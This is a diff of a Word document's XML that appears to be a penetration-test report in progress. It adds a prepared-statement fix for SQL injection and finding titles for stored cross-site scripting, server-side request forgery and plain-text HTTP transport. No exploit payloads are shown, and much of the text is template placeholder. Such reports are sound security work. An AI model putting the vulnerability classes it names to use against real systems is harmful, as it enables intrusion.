-            </w:pPr>
-            <w:r>
-              <w:t>The fix goes here</w:t>
+              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = $con-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>prepare(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>"SELECT * FROM Users WHERE username = ?");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>bind_</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>param</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>"s", $_GET["username"]);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>execute(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>close(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:widowControl w:val="0"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="3"/>
+              </w:numPr>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Only grant public users the access to the current database. This will prevent the attacker to access database metadata</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> and </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">make it harder to get the </w:t>
+            </w:r>
+            <w:r>
+              <w:t>schem</w:t>
+            </w:r>
+            <w:r>
+              <w:t>a</w:t>
+            </w:r>
+            <w:r>
+              <w:t>.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3699,12 +6068,15 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc69927397"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc71299216"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Finding 2 - Brief description in title</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="11"/>
+        <w:t xml:space="preserve">Finding 2 - </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Stored crossing-site scripting vulnerability present in anonymous question functionality</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p/>
     <w:tbl>
@@ -3745,14 +6117,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="12" w:name="_Toc69927398"/>
+            <w:bookmarkStart w:id="13" w:name="_Toc71299217"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Description</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="12"/>
+            <w:bookmarkEnd w:id="13"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -3778,9 +6150,6 @@
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
-            <w:r>
-              <w:t>Detailed description of the vulnerability, including a risk statement.</w:t>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -3803,14 +6172,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="13" w:name="_Toc69927399"/>
+            <w:bookmarkStart w:id="14" w:name="_Toc71299218"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Proof of Concept</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="13"/>
+            <w:bookmarkEnd w:id="14"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -3861,14 +6230,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="14" w:name="_Toc69927400"/>
+            <w:bookmarkStart w:id="15" w:name="_Toc71299219"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Impact</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="14"/>
+            <w:bookmarkEnd w:id="15"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -3936,14 +6305,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="15" w:name="_Toc69927401"/>
+            <w:bookmarkStart w:id="16" w:name="_Toc71299220"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Likelihood</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="15"/>
+            <w:bookmarkEnd w:id="16"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -4000,14 +6369,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="16" w:name="_Toc69927402"/>
+            <w:bookmarkStart w:id="17" w:name="_Toc71299221"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Risk Rating</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="16"/>
+            <w:bookmarkEnd w:id="17"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -4073,14 +6442,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="17" w:name="_Toc69927403"/>
+            <w:bookmarkStart w:id="18" w:name="_Toc71299222"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>References</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="17"/>
+            <w:bookmarkEnd w:id="18"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -4105,15 +6474,14 @@
                 <w:between w:val="nil"/>
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:hyperlink r:id="rId6" w:history="1">
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">[1] </w:t>
+            </w:r>
+            <w:hyperlink r:id="rId10" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
-                  <w:b/>
                 </w:rPr>
                 <w:t>https://www.miguelxpn.com/security/2020/03/08/Server-side-XSS.html</w:t>
               </w:r>
@@ -4156,14 +6524,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="18" w:name="_Toc69927404"/>
+            <w:bookmarkStart w:id="19" w:name="_Toc71299223"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Recommendation</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="18"/>
+            <w:bookmarkEnd w:id="19"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -4206,12 +6574,15 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc69927405"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc71299224"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Finding 3 - Brief description in title</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="19"/>
+        <w:t xml:space="preserve">Finding 3 - </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Server-side request forgery vulnerability present in the website validation functionality</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="20"/>
     </w:p>
     <w:p/>
     <w:p/>
@@ -4253,14 +6624,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="20" w:name="_Toc69927406"/>
+            <w:bookmarkStart w:id="21" w:name="_Toc71299225"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Description</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="20"/>
+            <w:bookmarkEnd w:id="21"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -4311,14 +6682,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="21" w:name="_Toc69927407"/>
+            <w:bookmarkStart w:id="22" w:name="_Toc71299226"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Proof of Concept</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="21"/>
+            <w:bookmarkEnd w:id="22"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -4369,14 +6740,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="22" w:name="_Toc69927408"/>
+            <w:bookmarkStart w:id="23" w:name="_Toc71299227"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Impact</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="22"/>
+            <w:bookmarkEnd w:id="23"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -4444,14 +6815,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="23" w:name="_Toc69927409"/>
+            <w:bookmarkStart w:id="24" w:name="_Toc71299228"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Likelihood</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="23"/>
+            <w:bookmarkEnd w:id="24"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -4508,14 +6879,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="24" w:name="_Toc69927410"/>
+            <w:bookmarkStart w:id="25" w:name="_Toc71299229"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Risk Rating</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="24"/>
+            <w:bookmarkEnd w:id="25"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -4581,14 +6952,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="25" w:name="_Toc69927411"/>
+            <w:bookmarkStart w:id="26" w:name="_Toc71299230"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>References</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="25"/>
+            <w:bookmarkEnd w:id="26"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -4645,14 +7016,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="26" w:name="_Toc69927412"/>
+            <w:bookmarkStart w:id="27" w:name="_Toc71299231"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Recommendation</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="26"/>
+            <w:bookmarkEnd w:id="27"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -4693,14 +7064,1056 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="28" w:name="_Toc71299232"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Finding </w:t>
+      </w:r>
+      <w:r>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> - </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Sensitive information transported in plain text via HTTP</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="28"/>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9000" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+          <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+          <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+          <w:insideH w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+          <w:insideV w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2595"/>
+        <w:gridCol w:w="6405"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2595" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Heading3"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="29" w:name="_Toc71299233"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Description</w:t>
+            </w:r>
+            <w:bookmarkEnd w:id="29"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6405" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Detailed description of the vulnerability, including a risk statement.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2595" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Heading3"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="30" w:name="_Toc71299234"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Proof of Concept</w:t>
+            </w:r>
+            <w:bookmarkEnd w:id="30"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6405" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t>How can we reproduce the exploit for this vulnerability?</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2595" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Heading3"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="31" w:name="_Toc71299235"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Impact</w:t>
+            </w:r>
+            <w:bookmarkEnd w:id="31"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6405" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve">Negligible/Minor/Moderate/Major/Catastrophic: An attacker could do </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>xyz</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve"> with this vulnerability</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2595" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Heading3"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="32" w:name="_Toc71299236"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Likelihood</w:t>
+            </w:r>
+            <w:bookmarkEnd w:id="32"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6405" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Rare/Unlikely/Possible/Likely/Almost Certain: The possibility of the vulnerability being exploited</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2595" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Heading3"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="33" w:name="_Toc71299237"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Risk Rating</w:t>
+            </w:r>
+            <w:bookmarkEnd w:id="33"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6405" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Informational / Low / Medium / High / Extreme</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t>This is the reasoning behind my rating</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2595" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Heading3"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="34" w:name="_Toc71299238"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>References</w:t>
+            </w:r>
+            <w:bookmarkEnd w:id="34"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
